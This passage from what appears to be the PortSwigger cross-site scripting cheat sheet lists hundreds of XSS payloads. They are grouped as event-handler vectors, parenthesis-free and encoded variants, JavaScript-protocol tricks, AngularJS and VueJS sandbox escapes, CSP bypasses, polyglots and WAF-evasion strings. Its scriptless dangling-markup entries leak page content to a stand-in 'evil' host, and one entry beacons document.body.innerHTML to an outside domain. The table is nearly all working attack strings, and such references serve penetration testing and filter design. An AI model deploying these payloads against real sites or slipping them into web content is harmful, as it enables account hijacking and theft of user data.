onwebkittransitionend | Fires when a CSS transition ends | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
Event handlers that do require user interaction
Event | Description | Code
onauxclick | Fires when right clicking or using the middle button of the mouse | <input onauxclick=alert(1)>
onbeforecopy | Requires you to copy a piece of text | <a onbeforecopy=alert(1) contenteditable>test</a>
onbeforecut | Requires you to cut a piece of text | <a onbeforecut=alert(1) contenteditable>test</a>
onbeforepaste | Requires you to paste a piece of text | <a onbeforepaste=alert(1) contenteditable>test</a>
onchange | Requires a change of value | <input onchange=alert(1) value=xss>
onclick | Requires a click on the element | <xss onclick=alert(1)>test</xss>
onclose | Fires when a dialog is closed | <dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu | Triggered when right clicking to show the context menu | <xss oncontextmenu=alert(1)>test</xss>
oncopy | Requires you to copy a piece of text | <xss oncopy=alert(1) value=XSS autofocus tabindex=1>test
oncut | Requires you to cut a piece of text | <xss oncut=alert(1) value=XSS autofocus tabindex=1>test
ondblclick | Triggered when double clicking the element | <xss ondblclick=alert(1) autofocus tabindex=1>test</xss>
ondrag | Triggered when dragging the element | <xss draggable=true ondrag=alert(1)>test</xss>
ondragend | Triggered when dragging of the element finishes | <xss draggable=true ondragend=alert(1)>test</xss>
ondragenter | Requires a mouse drag | <xss draggable=true ondragenter=alert(1)>test</xss>
ondragleave | Requires a mouse drag | <xss draggable=true ondragleave=alert(1)>test</xss>
ondragover | Triggered when dragging over an element | <div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart | Requires a mouse drag | <xss draggable=true ondragstart=alert(1)>test</xss>
ondrop | Triggered when dropping a draggable element | <div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange | Fires when a video changes full screen status | <video onfullscreenchange=alert(1) src="validvideo.mp4" controls>
oninput | Requires a change of value | <input oninput=alert(1) value=xss>
oninvalid | Requires a form submission with an element that does not satisfy its constraints, such as a required attribute | <form><input oninvalid=alert(1) required><input type=submit>
onkeydown | Triggered when a key is pressed | <xss onkeydown=alert(1) contenteditable>test</xss>
onkeypress | Triggered when a key is pressed | <xss onkeypress=alert(1) contenteditable>test</xss>
onkeyup | Triggered when a key is released | <xss onkeyup=alert(1) contenteditable>test</xss>
onmousedown | Triggered when the mouse button is pressed | <xss onmousedown=alert(1)>test</xss>
onmouseenter | Triggered when the mouse is hovered over the element | <xss onmouseenter=alert(1)>test</xss>
onmouseleave | Triggered when the mouse is moved away from the element | <xss onmouseleave=alert(1)>test</xss>
onmousemove | Requires mouse movement | <xss onmousemove=alert(1)>test</xss>
onmouseout | Triggered when the mouse is moved away from the element | <xss onmouseout=alert(1)>test</xss>
onmouseover | Requires a hover over the element | <xss onmouseover=alert(1)>test</xss>
onmouseup | Triggered when the mouse button is released | <xss onmouseup=alert(1)>test</xss>
onmousewheel | Fires when the mouse wheel scrolls | <xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange | Fires when a video changes full screen status | <video onmozfullscreenchange=alert(1) src="validvideo.mp4" controls>
onpagehide | Fires when the page is changed | <body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste | Requires you to paste a piece of text | <a onpaste=alert(1) contenteditable>test</a>
onpause | Requires clicking the element to pause | <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpointerdown | Fires on pointer (mouse) down | <xss onpointerdown=alert(1)>XSS</xss>
onpointerenter | Fires when the pointer enters the element | <xss onpointerenter=alert(1)>XSS</xss>
onpointerleave | Fires when the pointer leaves the element | <xss onpointerleave=alert(1)>XSS</xss>
onpointermove | Fires when the pointer moves | <xss onpointermove=alert(1)>XSS</xss>
onpointerout | Fires when the pointer moves out of the element | <xss onpointerout=alert(1)>XSS</xss>
onpointerover | Fires when the pointer moves over the element | <xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate | Fires when the pointer changes | <xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup | Fires on pointer (mouse) up | <xss onpointerup=alert(1)>XSS</xss>
onreset | Requires a click | <form onreset=alert(1)><input type=reset>
onsearch | Fires when a form is submitted and the input has a type attribute of search | <form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked | Requires clicking the element's timeline | <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking | Requires clicking the element's timeline | <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onselect | Requires you to select text | <input onselect=alert(1) value=XSS autofocus>
onselectionchange | Fires when the text selection on the page changes | <body onselectionchange=alert(1)>select some text
onselectstart | Fires when beginning a text selection | <body onselectstart=alert(1)>select some text
onshow | Fires when a context menu is shown | <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit | Requires a form submission | <form onsubmit=alert(1)><input type=submit>
ontouchend | Fires when a touch on the screen ends (mobile devices only) | <body ontouchend=alert(1)>
ontouchmove | Fires when a touch moves across the screen (mobile devices only) | <body ontouchmove=alert(1)>
ontouchstart | Fires when the screen is touched (mobile devices only) | <body ontouchstart=alert(1)>
onvolumechange | Requires a volume adjustment | <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onwheel | Fires when you use the mouse wheel | <body onwheel=alert(1)>
Restricted characters
Description | Code
No parentheses, using exception handling | <script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons | <script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions | <script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval | <script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval, on Firefox | <script>onerror=eval;throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval | <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without | <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect | <script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings | <script>location=name</script>
No parentheses, using template strings | <script>alert`1`</script>
No parentheses, using template strings and location hash | <script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces, using template strings and location hash | <script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Description | Code
Bootstrap onanimationstart event | <xss class=progress-bar-animated onanimationstart=alert(1)>
Bootstrap ontransitionend event | <xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
Protocols
Description | Code
Iframe src attribute with JavaScript protocol | <iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol | <object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol | <embed src="javascript:alert(1)">
A standard JavaScript protocol | <a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive | <a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol | <a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol (the whitespace shown stands for one of them) | <a href="javas cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (the whitespace shown stands for one of them) | <a href="javascript :alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol | <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values | <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using from/to | <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag | <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src | <script src="data:text/javascript,alert(1)"></script>
SVG script href attribute without closing script tag | <svg><script href="data:text/javascript,alert(1)" />
SVG use element (Chrome/Firefox) | <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL | <script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol rewriting relative URLs | <base href="javascript:/a/-alert(1)//"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable | <math><x href="javascript:alert(1)">blah
Button and formaction | <form><button formaction=javascript:alert(1)>XSS
Input and formaction | <form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action | <form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL | <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values | <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using srcdoc attribute | <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities | <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form | <form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements | <input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements | <link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage | <a href=# download="filename.html">Test</a>
Disable referrer using referrerpolicy | <img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via parameter on the window.open function | <a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//','alert(1)')">XSS</a>
Set window.name via name attribute in an <iframe> tag | <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via target attribute in a <base> tag | <base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in an <a> tag | <a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via usemap attribute in an <img> tag | <img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via target attribute in a <form> tag | <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="%27;eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via formtarget attribute in an <input> tag, type submit | <form><input type=hidden name=x value="%27;eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in an <input> tag, type image | <form><input type=hidden name=x value="%27;eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain | <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute UTF-7 | <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7 via Content-Type | <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters, variant 1 (has to be at the start of the document) | +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters, variant 2 (has to be at the start of the document) | +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters, variant 3 (has to be at the start of the document) | +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters, variant 4 (has to be at the start of the document) | +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests | <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox | <iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referrer | <meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8 (raw bytes) | \xC0\xBCscript>alert(1)</script> \xE0\x80\xBCscript>alert(1)</script> \xF0\x80\x80\xBCscript>alert(1)</script> \xF8\x80\x80\x80\xBCscript>alert(1)</script> \xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>
Unicode escapes | <script>\u0061lert(1)</script>
Unicode escapes, ES6 style | <script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded | <script>\u{0000000061}lert(1)</script>
Hex encoding JavaScript escapes | <script>eval('\x61lert(1)')</script>
Octal encoding | <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon | <a href="&#106avascript:alert(1)">XSS</a> <a href="&#106;avascript:alert(1)">XSS</a>
SVG script with HTML encoding | <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1),&quot;"</script></svg>
Decimal encoding with padded zeros | <a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities | <a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9 | <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding with padded zeros | <a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive | <a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities | <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding | <a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding | <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
Obfuscation
Data protocol inside script src with base64 | <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities | <script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding | <script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc HTML encoded | <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding | <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding | <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS (reflected)
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes (reflected)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | {{')))};alert(1)//');}}
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({[$='constructor']:$.getOwnPropertyDescriptor(_.__proto__,$).value},0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | {{')))};alert(1)//');}}
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | {{')))};alert(1)//');}}
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']][x]=constructor.getOwnPropertyDescriptor;g={}[['__proto__']][x];{}[['__proto__']][y]=g(''.sub[['__proto__']],'constructor');{}[['__proto__']][z]=constructor.defineProperty;d={}[['__proto__']][z];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']][y].value('alert(1)')()
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | ')))};alert(1)//');
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute | <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet | <link rel=stylesheet href="//evil?
Link href icon | <link rel=icon href="//evil?
Meta refresh | <meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute | <img src="//evil? <image src="//evil?
Video using track element | <video><track default src="//evil?
Video using source element and src attribute | <video><source src="//evil?
Audio using source element and src attribute | <audio><source src="//evil?
Input src | <input type=image src="//evil?
Button using formaction | <form><button style="width:100%;height:100%;" type=submit formaction="//evil?
Input using formaction | <form><input type=submit value="XSS" style="width:100%;height:100%;" type=submit formaction="//evil?
Form using action | <button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data | <object data="//evil?
Iframe src | <iframe src="//evil?
Embed src | <embed src="//evil?
Use textarea to consume markup and post to external site | <form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using formtarget | <button form=x>XSS</button><form id=x action=//evil target='
Pass markup data through window.name using base target | <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget | <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data | <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page | <embed src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using iframe window name to pass data from the page | <iframe src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using object window name to pass data from the page | <object data="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using frame window name to pass data from the page | <frameset><frame src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Overwrite type attribute with image in hidden inputs | <input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1 | javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2 | javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3 | javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string, string concatenation (window) | window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (self) | self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (this) | this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (top) | top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (parent) | parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (frames) | frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (globalThis) | globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window) | window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (self) | self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (this) | this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (top) | top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (parent) | parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (frames) | frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (globalThis) | globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window) | window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (self) | self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (this) | this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (top) | top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (parent) | parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (frames) | frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (globalThis) | globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window) | window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self) | self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this) | this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top) | top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent) | parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames) | frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis) | globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window) | window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self) | self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this) | this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top) | top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent) | parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames) | frames['\141\154\145\162\164']('\130\123\123')
